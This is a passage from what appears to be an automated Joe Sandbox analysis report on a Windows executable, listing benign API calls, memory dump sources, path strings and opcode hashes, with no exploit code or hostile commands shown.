                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76F93420,0040365D,0040349F,?), ref: 0040369F
                                                            • GlobalFree.KERNEL32(?), ref: 004036A6
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403697
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Free$GlobalLibrary
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 1100898210-297319885
                                                            • Opcode ID: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                            • Instruction ID: 198638f61427fefc2148c68e53f1161767bd25bd987848fccacf8e5b1a1d3e49
                                                            • Opcode Fuzzy Hash: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                            • Instruction Fuzzy Hash: C1E08C3250112067CA315F65E90472AB76CAF4AB22F05442AE8807B36087745C534BC8
                                                            APIs
                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\YrCSUX2O3I.exe,C:\Users\user\Desktop\YrCSUX2O3I.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00405800
                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\YrCSUX2O3I.exe,C:\Users\user\Desktop\YrCSUX2O3I.exe,80000000,00000003,?,?,?,00000000,004033FE), ref: 00405810
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrlen
                                                            • String ID: C:\Users\user\Desktop
                                                            • API String ID: 2709904686-2743851969
                                                            • Opcode ID: cb74b58fbf665d9c84b1068e3f9d72a75ce1c9c55f4980f1e918d92df7a9c5c8
                                                            • Instruction ID: 957e04025a41c1941cffb014cac20df3e0ff5def3477a48c76d927f6f21090a4
                                                            • Opcode Fuzzy Hash: cb74b58fbf665d9c84b1068e3f9d72a75ce1c9c55f4980f1e918d92df7a9c5c8
                                                            • Instruction Fuzzy Hash: EED05EB3411D209AD3127B04DC04A9F67ACFF51300746846AE841A61A1D7B85C908AEC
                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
                                                            • lstrcmpiA.KERNEL32(?,?), ref: 0040595C
                                                            • CharNextA.USER32(?,?,00000000,00405B51,00000000,[Rename]), ref: 0040596D
                                                            • lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                            • Instruction ID: d765cdcf26b5ece385e96dcd0ac43345a120d35f2bfa0d6b32256e58560247d7
                                                            • Opcode Fuzzy Hash: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                            • Instruction Fuzzy Hash: 60F09632504918FFC7129FA5DD00D9FBBA8EF163A4B2540BAE841F7211D674DE019F59